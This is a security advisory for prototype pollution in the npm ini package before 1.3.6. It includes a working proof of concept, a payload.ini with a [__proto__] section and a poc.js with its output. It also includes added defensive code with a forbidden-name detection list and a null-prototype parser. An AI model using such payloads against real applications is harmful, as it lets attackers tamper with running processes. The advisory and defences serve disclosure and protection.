[NPM:GHSA-QQGX-2P2H-9C37] ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Severity High
Affected Packages 1
Fixed Packages 1
CVEs 1

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, it will pollute Object.prototype in the application process, because a section named `__proto__` is written as a property of the result object. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini:
```ini
[__proto__]
polluted = "polluted"
```

poc.js:
```javascript
var fs = require('fs')
var ini = require('ini')

// Parse the attacker-controlled INI file; the [__proto__] section lands on Object.prototype
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
// An undeclared identifier resolves through globalThis and its prototype chain,
// so this prints the polluted value instead of throwing a ReferenceError
console.log(polluted)
```

```
node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
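The following is an added example, not code from the ini package or from this advisory. It shows the two defensive measures that close the hole reproduced above: a pre-parse check that flags INI lines whose section or key names target the prototype chain (usable as an input gate or a detection rule over uploaded config files), and a minimal INI parser that builds null-prototype objects and refuses those names outright. The payload string mirrors the advisory's payload.ini; the benign config, the function names and the forbidden-name list are assumptions made for this example.

```javascript
'use strict';
// Added example (not the ini package's code). Names that, used as an INI
// section or key, would reach the prototype chain via plain property assignment.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Match a section header like "[name]" or "[a.b]" and capture its inner name.
const SECTION_RE = /^\[\s*([^\]]*?)\s*\]$/;

// Return the 1-based line numbers whose section header or key is a forbidden
// name. Dotted section names ([a.__proto__]) are nested by ini, so every
// segment is checked.
function findPollutionAttempts(text) {
  const hits = [];
  text.split(/\r?\n/).forEach((raw, i) => {
    const line = raw.trim();
    if (!line || line[0] === ';' || line[0] === '#') return;
    const section = line.match(SECTION_RE);
    if (section) {
      if (section[1].split('.').some((s) => FORBIDDEN.has(s))) hits.push(i + 1);
      return;
    }
    const eq = line.indexOf('=');
    const key = (eq === -1 ? line : line.slice(0, eq)).trim();
    if (FORBIDDEN.has(key)) hits.push(i + 1);
  });
  return hits;
}

// Parse INI text into null-prototype objects, throwing on a forbidden name so
// the caller notices the attempt instead of silently dropping it.
function parseIniSafe(text) {
  const root = Object.create(null);
  let current = root;
  text.split(/\r?\n/).forEach((raw, i) => {
    const line = raw.trim();
    if (!line || line[0] === ';' || line[0] === '#') return;
    const section = line.match(SECTION_RE);
    if (section) {
      current = root;
      for (const part of section[1].split('.')) {
        if (FORBIDDEN.has(part)) throw new Error(`line ${i + 1}: forbidden section name "${part}"`);
        if (typeof current[part] !== 'object') current[part] = Object.create(null);
        current = current[part];
      }
      return;
    }
    const eq = line.indexOf('=');
    const key = (eq === -1 ? line : line.slice(0, eq)).trim();
    if (FORBIDDEN.has(key)) throw new Error(`line ${i + 1}: forbidden key "${key}"`);
    let value = eq === -1 ? 'true' : line.slice(eq + 1).trim();
    // Strip surrounding double quotes, as in polluted = "polluted"
    if (value.length >= 2 && value[0] === '"' && value[value.length - 1] === '"') {
      value = value.slice(1, -1);
    }
    current[key] = value;
  });
  return root;
}

// Constructed input mirroring the advisory's payload.ini.
const PAYLOAD = '[__proto__]\npolluted = "polluted"\n';

// Constructed benign config (assumption for this example).
const BENIGN = '; comment\n[server]\nhost = "localhost"\nport = 8080\n[server.tls]\nenabled = true\n';

// Run both inputs through the check and the parser; report whether the
// payload was flagged and rejected and whether Object.prototype stayed clean.
function demo() {
  const hits = findPollutionAttempts(PAYLOAD);
  let rejected = false;
  try { parseIniSafe(PAYLOAD); } catch (e) { rejected = true; }
  const cfg = parseIniSafe(BENIGN);
  return {
    hits,
    rejected,
    port: cfg.server.port,
    tls: cfg.server.tls.enabled,
    pristine: ({}).polluted === undefined,
  };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

Running the file prints `{ hits: [ 1 ], rejected: true, port: '8080', tls: 'true', pristine: true }`: the payload is flagged on line 1 and refused, the benign config parses into nested null-prototype objects, and a fresh `{}` has no `polluted` property afterwards. For code that must keep using the ini package, the same check can gate input before calling ini.parse, alongside upgrading to 1.3.6 or later.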

Package | Name | Affected version | Fixed version
--- | --- | --- | ---
pkg:npm/ini | ini | < 1.3.6 | = 1.3.6